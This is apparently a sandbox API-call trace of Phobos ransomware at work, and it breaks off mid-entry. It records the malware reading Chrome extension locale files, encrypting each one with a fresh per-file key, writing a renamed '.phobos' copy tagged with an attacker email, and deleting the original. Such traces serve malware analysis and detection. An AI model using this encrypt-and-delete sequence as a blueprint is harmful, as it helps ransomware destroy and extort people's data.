[0155.029] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x177, lpOverlapped=0x0) returned 1 [0155.030] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x180, dwBufLen=0x180 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x180) returned 1 [0155.030] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x180, lpOverlapped=0x0) returned 1 [0155.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.031] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.031] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.031] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.031] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.031] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.031] CloseHandle (hObject=0x130) returned 1 [0155.031] CloseHandle (hObject=0x134) returned 1 [0155.031] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json")) returned 1 [0155.032] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.033] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0155.033] CloseHandle (hObject=0x134) returned 1 [0155.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json")) returned 0x2020 [0155.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.034] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.034] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.034] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.034] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0155.035] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0155.035] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0155.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.036] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.036] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.036] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.036] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.037] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.037] CloseHandle (hObject=0x134) returned 1 [0155.037] CloseHandle (hObject=0x130) returned 1 [0155.037] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json")) returned 1 [0155.038] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.039] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=176) returned 1 [0155.039] CloseHandle (hObject=0x130) returned 1 [0155.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0155.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.039] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.039] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.040] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.040] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.040] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb0, lpOverlapped=0x0) returned 1 [0155.043] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0155.043] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0155.044] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.044] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.044] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.044] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.044] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.044] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.044] CloseHandle (hObject=0x130) returned 1 [0155.044] CloseHandle (hObject=0x134) returned 1 [0155.045] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json")) returned 1 [0155.046] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.049] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=210) returned 1 [0155.049] CloseHandle (hObject=0x134) returned 1 [0155.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json")) returned 0x2020 [0155.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.050] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.050] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.050] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.050] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd2, lpOverlapped=0x0) returned 1 [0155.051] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0155.051] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0155.052] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.052] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.052] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.052] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.052] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.053] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.053] CloseHandle (hObject=0x134) returned 1 [0155.053] CloseHandle (hObject=0x130) returned 1 [0155.053] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json")) returned 1 [0155.054] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.054] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=170) returned 1 [0155.054] CloseHandle (hObject=0x130) returned 1 [0155.055] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0155.055] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.055] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.055] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.056] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.056] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.056] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaa, lpOverlapped=0x0) returned 1 [0155.057] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0155.057] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0155.058] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.058] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.058] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.058] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.058] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, 